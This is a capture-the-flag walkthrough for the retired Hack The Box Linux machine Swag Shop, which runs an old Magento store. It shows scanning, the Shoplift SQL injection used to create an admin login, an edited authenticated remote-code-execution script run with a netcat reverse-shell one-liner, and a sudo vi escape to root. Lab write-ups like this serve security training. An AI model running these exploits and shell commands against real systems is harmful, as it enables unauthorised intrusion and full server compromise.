Name: Swag Shop
Release Date: 11 May 2019
Retire Date: 28 Sep 2019
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
evilet 00 days, 00 hours, 50 mins, 50 seconds
Lemming 00 days, 01 hours, 17 mins, 40 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -Pn -p- -oA ./SwagShop

$ nmap -sC -sV -Pn -p- -oA ./SwagShop
Starting Nmap 7.80 ( ) at 2020-08-09 18:47 EDT
Warning: giving up on port because retransmission cap hit (10).
Nmap scan report for
Host is up (0.061s latency).
Not shown: 65532 closed ports
22/tcp    open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page  
63871/tcp filtered unknown 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

Service detection performed. Please report any incorrect results at .                                    
Nmap done: 1 IP address (1 host up) scanned in 8862.59 seconds 

We've got HTTP and SSH. On HTTP we find a version of a Magneto web store selling HTB swag.  If you look at the footer, you can see that it is a version of the Magneto Demo Store from 2014.  Let's run a quick ExploitDB to see if we've got an easy in here.

$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u
Gobuster v3.0.1                                                                                     
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)                                     
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/08/09 19:04:57 Starting gobuster
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/app (Status: 301)
/errors (Status: 301)
/favicon.ico (Status: 200)
/includes (Status: 301)
/js (Status: 301)
/lib (Status: 301)
/media (Status: 301)
/pkginfo (Status: 301)
/server-status (Status: 403)
/shell (Status: 301)
/skin (Status: 301)
/var (Status: 301)
2020/08/09 19:07:11 Finished


So, I start nav'ing through some of these new found folders and fins /app/etc/local.xml which incidentally gives me the exact install date needed for the original exploit.  It also gives me some database credentials

Digging through some more, we find CVE-2015-1397 which is a vulnerability in Magneto's Shoplift where we can pull a SQLi to get the admin creds we need.  It (PoC code) can be found here.  If we run it, we should have admin creds.



$ python

Check with creds ypwq:123


Now we can check them at to make sure they work.

Now that we know that the admin creds work, we can jump back to the first exploit and add all the variables we need.


# Config.
username = 'ypwq'
password = '123'
php_function = 'system' # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000' # This needs to be the exact date from /app/etc/local.xml


I also changed the entire browser form handling:


#br.form.new_control('text', 'login[username]', {'value': username})  # Had to manually add username control.
#br['login[username]'] = username
#br['login[password]'] = password
userone = br.find_control(name='login[username]', nr=0)
userone.value = username
passone = br.find_control(name='login[password]', nr=0)
passone.value = password


And enabled the proxy setting so Burp would see what was happening.

I ended up playing with the POST endpoint until I got a response from the 2y instead of 7d endpoint.  I changed that in the script


request = + 'block/tab_orders/period/2y/?isAjax=true', data='isAjax=false&form_key=' + key)


And ran it with:


python "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 9999 >/tmp/f"


Yahtzee!  I've got a www-data shell.  The exploit code and the output are both in the CTB file.  Which brings us to the privesc of this box.  The LinEnum output shows us that www-data has some NO PASSWORD sudo capabilities.


[00;31m[-] Sudoers configuration (condensed):[00mDefaults env_reset
Defaults mail_badpass
Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
%admin ALL=(ALL) ALL
www-data ALL=NOPASSWD:/usr/bin/vi /var/www/html/*


Well, in this case Vim is a GTFObin.  We love GTFObins.


If we try:


sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'


We should (and do) get a root shell